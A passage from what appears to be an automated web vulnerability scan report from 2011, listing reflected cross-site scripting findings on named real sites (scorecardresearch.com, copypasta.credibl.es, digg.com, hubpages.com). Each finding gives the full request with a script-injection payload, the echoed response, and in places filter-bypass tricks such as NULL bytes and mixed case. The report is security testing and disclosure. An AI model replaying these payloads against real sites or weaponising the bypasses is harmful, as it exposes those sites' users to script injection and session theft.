COMSCORE.beacon({c1:"8", c2:"6035145", c3:"4845000000000000003", c4:"", c5:"", c6:"", c10:"", c15:"7e92c<script>alert(1)</script>29a2dc4c34a", c16:"", r:""});

2.7. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 24c33<script>alert(1)</script>f3089f61a81 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=603514524c33<script>alert(1)</script>f3089f61a81&c3=4845000000000000003&c4=&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 18 Feb 2011 18:49:35 GMT
Date: Fri, 11 Feb 2011 18:49:35 GMT
Connection: close
Content-Length: 3599

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
unction(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"603514524c33<script>alert(1)</script>f3089f61a81", c3:"4845000000000000003", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

2.8. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 95862<script>alert(1)</script>76f209dab7e was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6035145&c3=484500000000000000395862<script>alert(1)</script>76f209dab7e&c4=&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 18 Feb 2011 18:49:35 GMT
Date: Fri, 11 Feb 2011 18:49:35 GMT
Connection: close
Content-Length: 3599

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6035145", c3:"484500000000000000395862<script>alert(1)</script>76f209dab7e", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

2.9. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 24119<script>alert(1)</script>6e5828325a3 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6035145&c3=4845000000000000003&c4=24119<script>alert(1)</script>6e5828325a3&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 18 Feb 2011 18:49:35 GMT
Date: Fri, 11 Feb 2011 18:49:35 GMT
Connection: close
Content-Length: 3599

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6035145", c3:"4845000000000000003", c4:"24119<script>alert(1)</script>6e5828325a3", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

2.10. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 8f81a<script>alert(1)</script>dff6d8e6cce was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6035145&c3=4845000000000000003&c4=&c5=8f81a<script>alert(1)</script>dff6d8e6cce&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 18 Feb 2011 18:49:36 GMT
Date: Fri, 11 Feb 2011 18:49:36 GMT
Connection: close
Content-Length: 3599

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
re;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6035145", c3:"4845000000000000003", c4:"", c5:"8f81a<script>alert(1)</script>dff6d8e6cce", c6:"", c10:"", c15:"", c16:"", r:""});

2.11. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 28803<script>alert(1)</script>08c6fcd7d5f was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6035145&c3=4845000000000000003&c4=&c5=&c6=28803<script>alert(1)</script>08c6fcd7d5f&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 18 Feb 2011 18:49:36 GMT
Date: Fri, 11 Feb 2011 18:49:36 GMT
Connection: close
Content-Length: 3599

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6035145", c3:"4845000000000000003", c4:"", c5:"", c6:"28803<script>alert(1)</script>08c6fcd7d5f", c10:"", c15:"", c16:"", r:""});

2.12. http://copypasta.credibl.es/stylesheets/compiled/copypasta.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://copypasta.credibl.es
Path:   /stylesheets/compiled/copypasta.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ae30b<script>alert(1)</script>9f79a2b85ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /stylesheets/compiledae30b<script>alert(1)</script>9f79a2b85ca/copypasta.css?v=2 HTTP/1.1
Host: copypasta.credibl.es
Proxy-Connection: keep-alive
Referer: http://arstechnica.com/apple/news/2011/02/six-minute-keychain-hack-highlights-busted-iphone-security-model.ars
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.67
Date: Fri, 11 Feb 2011 19:22:14 GMT
Content-Type: text/plain
Connection: keep-alive
X-Cascade: pass
Content-Length: 93
X-Varnish: 1676992181
Age: 0
Via: 1.1 varnish

File not found: /stylesheets/compiledae30b<script>alert(1)</script>9f79a2b85ca/copypasta.css

2.13. http://copypasta.credibl.es/stylesheets/compiled/copypasta.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://copypasta.credibl.es
Path:   /stylesheets/compiled/copypasta.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ae7a8<script>alert(1)</script>a9785df6772 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /stylesheets/compiled/copypasta.cssae7a8<script>alert(1)</script>a9785df6772?v=2 HTTP/1.1
Host: copypasta.credibl.es
Proxy-Connection: keep-alive
Referer: http://arstechnica.com/apple/news/2011/02/six-minute-keychain-hack-highlights-busted-iphone-security-model.ars
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.67
Date: Fri, 11 Feb 2011 19:22:16 GMT
Content-Type: text/plain
Connection: keep-alive
X-Cascade: pass
Content-Length: 93
X-Varnish: 3841015658
Age: 0
Via: 1.1 varnish

File not found: /stylesheets/compiled/copypasta.cssae7a8<script>alert(1)</script>a9785df6772

2.14. http://digg.com/remote-submit [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /remote-submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0074e09"><ScRiPt>alert(1)</ScRiPt>996a87db1cb was submitted in the REST URL parameter 1. This input was echoed as 74e09"><ScRiPt>alert(1)</ScRiPt>996a87db1cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Request

GET /remote-submit%0074e09"><ScRiPt>alert(1)</ScRiPt>996a87db1cb HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 11 Feb 2011 21:08:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1458898097449992448%3A180; expires=Sat, 12-Feb-2011 21:08:37 GMT; path=/; domain=digg.com
Set-Cookie: d=8c53a5f3d0217831cca27dd9a043299858a02c2ad24e2c437b53eb8a7149e65f; expires=Thu, 11-Feb-2021 07:16:17 GMT; path=/; domain=.digg.com
X-Digg-Time: D=241537 10.2.129.78
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15632

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/remote-submit%0074e09"><ScRiPt>alert(1)</ScRiPt>996a87db1cb.rss">
...[SNIP]...

2.15. http://digg.com/submit [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00cf201"><script>alert(1)</script>56f50e4da51 was submitted in the REST URL parameter 1. This input was echoed as cf201"><script>alert(1)</script>56f50e4da51 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /submit%00cf201"><script>alert(1)</script>56f50e4da51 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 11 Feb 2011 21:08:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1458898097449992448%3A180; expires=Sat, 12-Feb-2011 21:08:08 GMT; path=/; domain=digg.com
Set-Cookie: d=7790e3bcd773131188588be60902b297e1566c5c2d8e4567c363f32a95040d0e; expires=Thu, 11-Feb-2021 07:15:48 GMT; path=/; domain=.digg.com
X-Digg-Time: D=220052 10.2.129.225
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15613

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%00cf201"><script>alert(1)</script>56f50e4da51.rss">
...[SNIP]...

2.16. http://hubpages.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 548f8"><script>alert(1)</script>9a7d90ba46e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?548f8"><script>alert(1)</script>9a7d90ba46e=1 HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:15:39 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 29252

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/?548f8"><script>alert(1)</script>9a7d90ba46e=1', 'HubPages'); return false;">
...[SNIP]...

2.17. http://hubpages.com/about/advertise [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /about/advertise

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23253"><script>alert(1)</script>b500e541fe8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about23253"><script>alert(1)</script>b500e541fe8/advertise HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:17:56 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5698

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/about23253"><script>alert(1)</script>b500e541fe8/advertise', 'Page not found'); return false;">
...[SNIP]...

2.18. http://hubpages.com/about/advertise [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /about/advertise

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40c6c"><script>alert(1)</script>7545254ff79 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about/advertise?40c6c"><script>alert(1)</script>7545254ff79=1 HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:17:53 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 9876

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/about/advertise?40c6c"><script>alert(1)</script>7545254ff79=1', 'Advertise on HubPages'); return false;">
...[SNIP]...

2.19. http://hubpages.com/hubs/hot/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /hubs/hot/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad8bd"><script>alert(1)</script>8ae6a13056a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad8bd"><script>alert(1)</script>8ae6a13056a/hot/ HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Referer: http://hubpages.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:16:40 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/ad8bd"><script>alert(1)</script>8ae6a13056a/hot/', 'Page not found'); return false;">
...[SNIP]...

2.20. http://hubpages.com/hubs/hot/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /hubs/hot/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9cd29"><script>alert(1)</script>a7b16cce6e7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hubs/hot/?9cd29"><script>alert(1)</script>a7b16cce6e7=1 HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Referer: http://hubpages.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:16:39 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 19071

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Hot Hubs" href="http://hubpages.com/hubs/hot/?9cd29"><script>alert(1)</script>a7b16cce6e7=1&amp;rss" />
...[SNIP]...

2.21. http://hubpages.com/my/hubs/stats [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /my/hubs/stats

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42fda"><script>alert(1)</script>dcab9466b78 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my42fda"><script>alert(1)</script>dcab9466b78/hubs/stats HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:20:08 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/my42fda"><script>alert(1)</script>dcab9466b78/hubs/stats', 'Page not found'); return false;">
...[SNIP]...

2.22. http://hubpages.com/my/hubs/stats [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /my/hubs/stats

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1bf69"><script>alert(1)</script>92d7c54b2f9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my/hubs1bf69"><script>alert(1)</script>92d7c54b2f9/stats HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:20:18 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
